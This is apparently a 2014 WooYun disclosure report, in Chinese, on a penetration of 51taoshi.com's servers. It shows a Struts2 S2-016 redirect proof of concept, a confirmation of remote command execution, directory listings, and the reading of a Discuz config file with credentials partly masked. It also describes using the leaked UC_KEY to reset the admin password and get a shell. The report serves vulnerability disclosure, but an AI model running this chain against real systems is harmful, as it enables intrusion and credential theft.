当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049246

漏洞标题:[淘师湾渗透测试#1]某站远程命令执行可导致shell

相关厂商:51taoshi.com

漏洞作者: 开心超人

提交时间:2014-01-26 18:10

修复时间:2014-03-12 18:11

公开时间:2014-03-12 18:11

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-26: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-02-06: 细节向核心白帽子及相关领域专家公开
2014-02-16: 细节向普通白帽子公开
2014-02-26: 细节向实习白帽子公开
2014-03-12: 细节向公众公开

简要描述:

RT

详细说明:

TOP1:信息搜集
淘师湾主站及其大多数分站采用Apache struts2框架搭建,由于淘师湾在wooyun已收到类似报告 WooYun: 淘师湾某站struts2命令执行漏洞 ,可见在主站方面struts2漏洞无法利用。

C:\Users\Administrator>nslookup 51taoshi.com
服务器:  localhost
Address:  192.168.1.1
非权威应答:
名称:    51taoshi.com
Address:  219.139.243.44


域名解析到219.139.243.44,在此服务器上搭建的站点有I
1. www.thyuwen.com
2. taoshi.org.cn
3. 51taoshi.net.cn
4. www.51taoshi.com
5. www.51taoshi.cn
6. bbs.51taoshi.com
7. zuoye.51taoshi.com
8. 51taoshi.com
9. tyuan.51taoshi.com
10. ziyuan.51taoshi.com
11. yanxiu.51taoshi.com
12. tv.51taoshi.com
13. hbjjxt.e21.cn
hbjjxt.e21.cn这个旁站引起了我的注意,同样采用struts2框架搭建
TOP2:51taoshi.com旁站struts2 s2-016漏洞利用
一般旁站安全性都不高(相对于一个服务器上的主要网站而言),测试结果表明,淘师湾管理或运维人员在修补struts2漏洞时并没有修补完全,这个旁站存在很严重的远程命令执行漏洞。
POC:hbjjxt.e21.cn/loadLogin.action?redirect:http://www.yahoo.com/
重定向至yahoo!

Target: http://hbjjxt.e21.cn/loadLogin.action
Whoami: weblogic
WebPath: /data/webapps/hbjjxt


在后来的检测中很遗憾淘师湾的struts2并没有开启上传功能,也许因为之前的报告原因。
不论是渗透测试还是入侵,思路最重要,既然上传getshell被堵死了,那么便可以尝试别的方法。
注意到bbs.51taoshi.com采用Discuz论坛搭建。接着我执行了如下Linux shell commond

ls /data
====================================================================================================================================
app
hbjjxt
lost+found
Oracle
session
soft
webapp
webapps
weblogs


在接下来的摸索中顺利找到discuz论坛目录!

ls /data/webapp/bbs
====================================================================================================================================
��������20121028��.txt
301test.php
51taoshi_csmfpd
51taoshi.php
admin.php
aoyun.html
api
api.php
archiver
bbx
bbx.php
comiis_ad
comiis_config.php
comiis_contact
comiis_csmfpd
comiis_dl
comiis_jymfpd
comiis_mfcspd
comiis_x19lou
config
connect.php
contact.php
cp.php
crossdomain.xml
data
db
favicon.ico
forum.php
group.php
home.php
image
index.php
member.php
misc.php
mobile.png
plugin.php
popuppp_img
portal.php
repair_uc.php
robots.txt
search.php
sitemap
sitemap.php
source
static
template
test.php
uc_client
uc_server
userapp.php
weibo
xueke
xwb
xwb.php
cat /data/webapp/bbs/config/config_ucenter.php
====================================================================================================================================
<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', '211.85.*.*');
define('UC_DBUSER', 'tao*');
define('UC_DBPW', 'zs**');
define('UC_DBNAME', 'bbs');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`bbs`.pre_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', 'n0R7*****************************');
define('UC_API', 'http://bbs.51taoshi.com/uc_server');
define('UC_APPID', '*');
define('UC_IP', '');
define('UC_PPP', 20);

直接获取到discuz论坛的UC_KEY
TOP3:UC-KEY利用
在本地搭建一个完整的Discuz论坛

QQ截图20140118155251.png

QQ截图20140118155251.png

填入所获得的信息,具体利用细节参考 WooYun: 途牛网某服务配置失误 导致论坛敏感文件泄露(致使百万用户信息告急)
通过远程重置admin的密码即可进入后台

QQ截图20140118155251.png


TOP4:getshell
通过一枚Discuz后台拿shell漏洞搞到SHELL,在此不披露详细技术细节。

QQ截图20140118155251.png


数据库访问权限

QQ截图20140118155251.png


漏洞证明:

QQ截图20140118155251.png


QQ截图20140118155251.png


QQ截图20140118155251.png


具体细节见上

修复方案:

1.网络边界要做好防护,攻击者在主站尝试突破无果时,试下旁站也可能会有意想不到的收获。
2.参考http://sebug.net/vuldb/ssvid-60906
http://struts.apache.org/release/2.3.x/docs/s2-016.html

版权声明:转载请注明来源 开心超人@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-01-27 12:01

厂商回复:

工作疏忽,感谢提交

最新状态:

暂无